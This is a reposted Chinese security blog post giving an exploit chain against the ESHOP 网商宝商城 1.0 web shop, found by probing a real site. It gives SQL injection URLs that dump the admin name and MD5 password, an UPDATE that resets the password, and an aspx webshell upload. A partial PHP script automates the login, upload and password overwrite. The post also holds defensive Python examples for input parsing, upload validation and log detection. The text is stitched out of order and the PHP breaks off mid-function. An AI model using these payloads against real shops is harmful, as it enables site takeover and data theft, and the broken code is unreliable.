ESHOP 网商宝商城 1.0 GetWebshell Exploit

Category: lcx

One day I got up fairly late and found flyers on the floor.

I looked: it was an online shop.

So I wanted to see what software it was running. I looked around (HTML comments, CSS comments, file names) and found it was ESHOP 网商宝商城.

I googled for vulnerabilities and found some for "eshop"; I tested them, but they didn't match. The site did throw an error, though. It turned out there are other shop systems also called ESHOP.

I left it for two days, then remembered it and came back to test for injection again. It has filtering code. I downloaded the source and looked: it does not filter the select keyword.

In the front-end search, the "price from [ ] to [ ]" fields contain a numeric injection point.

Combined with the admin table name and column names found in the code, the data can then be dumped.

http://xxxx.com/p_list.aspx?keyword=%&maxPrice=0&minPrice=0 and (select top 1 admin from admin)>0

// login name of the first administrator

http://xxxx.com/p_list.aspx?keyword=%&maxPrice=0&minPrice=0 and (select top 1 password from admin)>0

// the password; standard MD5, everyone knows what to do with that.

The injection point also does not filter update, so if the password hash can't be reversed, it can simply be updated. One more point: the filtering code only filters GET requests.

Once in the back end: Product System -> Product Content -> List Image lets you upload an aspx file directly. As for the path: uploading an aspx directly doesn't display the path, so first upload a jpg to get the path, then upload the aspx and it's done.

Done.

PS: just monitoring, not doing any damage.
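Two defects come together in the injection described above: the keyword blacklist is incomplete (no select, no update) and it is applied only to GET parameters, while the price fields accept arbitrary strings into a numeric comparison. The following Python is an added example, not code from the page or from the ESHOP product: it models such a blacklist, then shows the fix that makes the keyword list irrelevant (typed parsing of the price plus a parameterised query). The table layout and the in-memory SQLite database are constructed for the demo; the real product is an ASP.NET application backed by SQL Server.

```python
import re
import sqlite3
from decimal import Decimal, InvalidOperation

# Constructed stand-in for the kind of keyword blacklist the write-up describes:
# it inspects only GET parameters and its word list omits "select" and "update".
BLACKLIST = re.compile(r"\b(insert|delete|drop|exec|xp_cmdshell)\b", re.IGNORECASE)

# The write-up's minPrice payload, used here only as a test input.
PAGE_PAYLOAD = "0 and (select top 1 admin from admin)>0"


def blacklist_filter_passes(method, params):
    """Model of the weak filter: True means the request would be let through."""
    if method != "GET":
        return True  # POST parameters are never inspected at all
    return not any(BLACKLIST.search(v) for v in params.values())


def parse_price(value):
    """Typed parsing: a price is a finite, non-negative decimal and nothing else.

    Raises ValueError for anything that is not a plain number, which removes the
    injection point regardless of what a keyword list does or does not contain.
    """
    try:
        price = Decimal(str(value).strip())
    except InvalidOperation:
        raise ValueError("price must be a decimal number") from None
    if not price.is_finite() or price < 0:
        raise ValueError("price must be a finite, non-negative number")
    return price


def price_is_valid(value):
    """Boolean wrapper around parse_price for callers that only need accept/reject."""
    try:
        parse_price(value)
        return True
    except ValueError:
        return False


def search_products(conn, keyword, min_price, max_price):
    """Parameterised query: inputs are bound values, never concatenated into SQL."""
    lo = float(parse_price(min_price))
    hi = float(parse_price(max_price))
    sql = ("SELECT name, price FROM product "
           "WHERE name LIKE ? AND price BETWEEN ? AND ? ORDER BY price")
    return conn.execute(sql, ("%" + keyword + "%", lo, hi)).fetchall()


def build_demo_db():
    """In-memory SQLite shop with constructed rows (the real product uses SQL Server)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (name TEXT, price REAL)")
    conn.execute("CREATE TABLE admin (admin TEXT, password TEXT)")
    conn.executemany("INSERT INTO product VALUES (?, ?)", [("mug", 5.0), ("lamp", 40.0)])
    conn.execute("INSERT INTO admin VALUES (?, ?)", ("admin", "<md5-placeholder>"))
    return conn


if __name__ == "__main__":
    db = build_demo_db()
    print("weak filter lets the payload through:",
          blacklist_filter_passes("GET", {"minPrice": PAGE_PAYLOAD}))
    print("typed parsing accepts the payload:", price_is_valid(PAGE_PAYLOAD))
    print("normal search:", search_products(db, "", "0", "10"))
```

The point of `parse_price` is that a numeric field should be converted to a number before it gets anywhere near the query; once that holds and the query binds its values, there is nothing left for a keyword list to catch, and the GET/POST asymmetry stops mattering because the same parser runs for both.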
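The list-image uploader accepts an aspx file and stores it under a path the attacker can discover by uploading a jpg first. As an added example (not code from the page or the product), here is an upload validator in Python that closes both gaps: an allow-list of image extensions checked against the file's leading bytes, and a server-generated stored name so the client never controls the path. The extension-to-magic-bytes table and the sample inputs are constructed for the demo.

```python
import os
import re
import secrets

# Allowed image extensions and the leading bytes a genuine file of that type carries.
IMAGE_MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
SAFE_BASENAME = re.compile(r"^[A-Za-z0-9_.-]{1,100}$")


def validate_image_upload(filename, data):
    """Return (accepted, detail).

    On success, detail is the server-chosen stored name; on failure it is the
    reason.  The client's filename is used only to read the extension and
    never becomes part of the stored path.
    """
    # Strip any directory component the client sent (Windows or POSIX style).
    base = os.path.basename(filename.replace("\\", "/"))
    if not SAFE_BASENAME.match(base):
        return False, "unsafe or empty filename"
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        # Exactly one extension: rejects "x.jpg.aspx", "x" and dotfiles.
        return False, "exactly one extension required"
    ext = parts[1]
    if ext not in IMAGE_MAGIC:
        # Allow-list, not a deny-list: .aspx, .ashx, .asp and anything else unknown fails here.
        return False, "extension not allowed: ." + ext
    if not any(data.startswith(m) for m in IMAGE_MAGIC[ext]):
        return False, "content is not a " + ext + " image"
    # Random stored name: no guessable path, and no name chosen by the uploader.
    stored = secrets.token_hex(16) + "." + ext
    return True, stored


if __name__ == "__main__":
    jpeg = b"\xff\xd8\xff\xe0" + bytes(16)          # constructed JPEG header
    print(validate_image_upload("asd.aspx", b"<%@ Page %>"))   # the write-up's upload name
    print(validate_image_upload("photo.jpg", jpeg))
    print(validate_image_upload("photo.jpg", b"<%@ Page %>"))
```

Validation alone is not the whole fix: the directory the images land in should also be configured so the web server never executes scripts from it (in IIS, by removing the script handler mappings for that folder), which means that even a file that slips past the check is served as a static file rather than run.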
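From the defender's side, the whole chain above leaves two distinctive traces in the web server log: SQL fragments inside the numeric price parameters of p_list.aspx, and a client that POSTs to the product editor and then fetches a server-side script from the image upload directory. The following Python is an added detection example, not part of the original post; the log format is a simplified IIS-style layout and the log lines are constructed to replay the described chain from one client address.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style log lines (not real logs): date time method uri-stem uri-query status client-ip.
SAMPLE_LOG = """\
2013-05-01 10:00:01 GET /p_list.aspx keyword=%25&maxPrice=0&minPrice=0 200 203.0.113.5
2013-05-01 10:00:07 GET /p_list.aspx keyword=%25&maxPrice=0&minPrice=0+and+(select+top+1+admin+from+admin)%3E0 500 203.0.113.5
2013-05-01 10:00:12 GET /p_list.aspx keyword=%25&maxPrice=0&minPrice=0;update%20admin%20set%20password=0x41%20where%20admin=0x42; 200 203.0.113.5
2013-05-01 10:01:30 POST /back-login.aspx - 302 203.0.113.5
2013-05-01 10:02:02 POST /manager/product_detail.aspx - 200 203.0.113.5
2013-05-01 10:02:05 GET /upload-file/images/product/20130501100202.aspx - 200 203.0.113.5
2013-05-01 10:03:00 GET /upload-file/images/product/lamp.jpg - 200 198.51.100.7
"""

# SQL fragments that have no business in a numeric price parameter.
SQLI_PATTERN = re.compile(
    r"(\bselect\b.*\bfrom\b|\bupdate\b.*\bset\b|\btop\s+\d+\b|\bxp_\w+|['\";])",
    re.IGNORECASE)
UPLOAD_DIR = "/upload-file/images/product/"
SERVER_SCRIPT_EXT = re.compile(r"\.(asp|aspx|ashx|asmx|soap|cer)$", re.IGNORECASE)
PRODUCT_EDITOR = "/manager/product_detail.aspx"


def parse_line(line):
    """Split one constructed log line into a record; the query is URL-decoded for matching."""
    _date, time, method, stem, query, status, ip = line.split()
    return {
        "time": time, "method": method.upper(), "stem": stem,
        "query": "" if query == "-" else unquote_plus(query),
        "status": int(status), "ip": ip,
    }


def detect(log_text):
    """Return (kind, client_ip, evidence) tuples for the two behaviours in the write-up."""
    alerts = []
    posted_to_editor = {}  # client ip -> time of its most recent POST to the product editor
    for line in log_text.splitlines():
        if not line.strip():
            continue
        r = parse_line(line)
        stem = r["stem"].lower()
        # 1. SQL syntax inside the search page's parameters.
        if stem.endswith("/p_list.aspx") and SQLI_PATTERN.search(r["query"]):
            alerts.append(("sqli_attempt", r["ip"], r["query"]))
        # 2. Remember who has used the product editor (where the upload form lives).
        if r["method"] == "POST" and stem == PRODUCT_EDITOR:
            posted_to_editor[r["ip"]] = r["time"]
        # 3. A server-side script being requested from the image directory.
        if stem.startswith(UPLOAD_DIR) and SERVER_SCRIPT_EXT.search(stem):
            kind = ("script_fetched_after_upload" if r["ip"] in posted_to_editor
                    else "script_in_upload_dir")
            alerts.append((kind, r["ip"], r["stem"]))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Any request for an .aspx under the image directory is worth an alert on its own, since nothing legitimate should ever be there; correlating it with a preceding POST to the editor from the same address simply raises the priority, and the 500 on the second p_list.aspx line is the kind of error the write-up mentions seeing when probing.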

/", $recvdata, $tempdata) == 0)
	{
		echo "rnlogin error";
		exit();
	}
	preg_match("//.*"/", $tempdata[0],  $VIEWSTATE);
	$VIEWSTATE[0] = str_replace('"', '', $VIEWSTATE[0]);
 
	$tempdata = "";
	preg_match("/__EVENTVALIDATION" va.*" />/", $recvdata, $tempdata);
	preg_match("//.*"/", $tempdata[0],  $EVENTVALIDATION);
	$EVENTVALIDATION[0] = str_replace('"', '', $EVENTVALIDATION[0]);

	$tempdate = "";
	preg_match("/ASP.NET_SessionId.*;/", $recvdata, $tempdata);
	$cookie = "Cookie: ASP.NET_SessionId=ovsnh045kuxv3s45lvmbbi55";
	
	$content = "__VIEWSTATE=".urlencode($VIEWSTATE[0])."&&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=".urlencode($EVENTVALIDATION[0])."&txtUserName=admin&txtPassword=123456&button=%C2%A0%C2%A0rn";
	$content = "__VIEWSTATE=".urlencode($VIEWSTATE[0])."&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=".urlencode($EVENTVALIDATION[0])."&txtUserName=".$adminname."&txtPassword=123456&button=%C2%A0dfg%C2%A0rnrn";
	$url = "POST ".$path."/back-login.aspx HTTP/1.1";
	$recvdata = SendData($host, $port, $url, $content, $cookie, $type);

	$tempdata = "";
	if (preg_match("/Cookie:.*;/", $recvdata, $tempdata) == 0)
	{
		echo "rnlogin error";
		exit();
	}
	 
	$cookie = $tempdata[0]." ASP.NET_SessionId=ovsnh045kuxv3s45lvmbbi55";
	$recvdata = SendData($host, $port, "GET ".$path."/manager/product_detail.aspx HTTP/1.1", "", $cookie, $type);
	$tempdata = "";
	$VIEWSTATE = "";
	$EVENTVALIDATION = "";
	if (preg_match("/__VIEWSTATE" va.*" />/", $recvdata, $tempdata) == 0)
	{
		echo "rnNo /manager";
		exit();
	}
	preg_match("//.*"/", $tempdata[0],  $VIEWSTATE);
	$VIEWSTATE[0] = str_replace('"', '', $VIEWSTATE[0]);
 
	$tempdata = "";
	preg_match("/__EVENTVALIDATION" va.*" />/", $recvdata, $tempdata);
	preg_match("//.*"/", $tempdata[0],  $EVENTVALIDATION);
	$EVENTVALIDATION[0] = str_replace('"', '', $EVENTVALIDATION[0]);
		
	$content = '------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="__EVENTTARGET"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="__EVENTARGUMENT"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="__LASTFOCUS"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="__VIEWSTATE"

';
	$content .= $VIEWSTATE[0]."rn";
	$content .= '------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="__EVENTVALIDATION"

';
	$content .= $EVENTVALIDATION[0]."rn";///wEWJwKs5v06Atqk0q0LAqiR6t4KAp6y8rMBAqKKxtACAsHKosgDAruSn4INAvvs89EPAoim8JICApjJ2vwOAofJ2vwOAobJ2vwOAoXJ2vwOAoTJ2vwOAoPJ2vwOAsWeztoBAtXx5LQNAvLf/5UFAvbTvuwMAqP8+4wOArWL1rkIArOYgK0OAuT2yp4BAtr2xvsMAqjJ1JIOApmbyKgEAu27qeUIAp7KhdUMAt/A1eoLAorU36cKAqyP95gBAvPv2FMCo5i5SQKW9+GSCQLKz7OlDALtheC3DwK87PLABgKokaLfCgKesorLBNFtpcfh8T+rQvlfSsD5CYiQmB8C
	$content .= '------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtProductName"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtOrderBy"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtStock"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtSaleNumber"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$ddlCategory"

0
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$ddlSecondCategory"

0
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$ddlThirdCategory"

0
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$ddlBrand"

0
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$chkIsShow"

on
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$chkIsComment"

on
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$chkIsNew"

on
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtPrice"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtSalePrice"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtIntegral"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$hiddenImage"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$hiddenImageId"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$fuUploadList"; filename="asd.aspx"
Content-Type: application/octet-stream


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$btnUploadList"

......
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$fuDetailImage"; filename=""


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$fuDetailZoomImage"; filename=""


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtKeywords"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtSummary"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtContent"


------------EwwmsGcmNCcEdWawAUBSNx--';
	
	$type = "Content-Type: multipart/form-data; boundary=----------EwwmsGcmNCcEdWawAUBSNx";//"Content-Type: multipart/form-data; boundary=----------FhmN6QFkeZCWDWoYR7K01F";
	$recvdata = SendData($host, $port, "POST ".$path."/manager/product_detail.aspx HTTP/1.1", $content, $cookie, $type);
	$tempdata = "";
	preg_match("/upload-file/images/product.*.aspx/", $recvdata, $tempdata);
	$url = 'GET '.$path.'/p_list.aspx?keyword=%&maxPrice=0&minPrice=0;update%20admin%20set%20password=0x'.$hexpassword.'%20where%20admin=0x'.$hexadminname.'; HTTP/1.1';
	SendData($host, $port, $url, $content, $cookie, $type);
	
	echo "rnwebshell:http://$host/".$tempdata[0]."rn";
	
function SendData($host, $port, $url, $content, $cookie, $type)
{
	$data = $url."rn";
	$data .= "Referer: http://$host/rn";
	$data .= $type."rn";
	$data .= "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1rn";
	$data .= "User-Agent: Opera/9.80 (Windows NT 5.2; U; zh-cn) Presto/2.10.229 Version/11.62rn";
	$data .= "Host: $hostrn";
	$data .= "Content-Length: ".strlen($content)."rn";
	$data .= "Accept-Encoding: gzip, deflatern";
	$data .= "Connection: Closern";
	$data .= $cookie."rnrn";
	$data .= $content;
	$ock=fsockopen($host,$port);
	if (!$ock) 
	{
		echo "No response from hostn";
	}
	fwrite($ock,$data);
	$recvdata = "";
	while (!feof($ock)) 
	{
		$exp=fgets($ock, 1024);
		$recvdata .= $exp;
	}
	fclose($ock);
	return $recvdata;
}
function SingleDecToHex($dec)
{
    $tmp="";
    $dec=$dec%16;
    if($dec

Reposted from: http://www.90sec.org/thread-2156-1-1.html

Article source: lcx.cc: ESHOP 网商宝商城 1.0 GetWebshell Exploit
